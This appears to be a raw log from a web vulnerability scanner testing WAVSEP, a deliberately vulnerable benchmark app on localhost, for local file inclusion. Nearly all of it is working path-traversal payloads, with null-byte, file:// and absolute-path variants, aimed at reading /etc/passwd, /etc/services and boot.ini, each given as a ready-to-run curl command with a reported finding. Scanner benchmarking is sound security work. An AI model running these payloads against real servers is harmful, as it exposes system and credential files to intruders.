GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
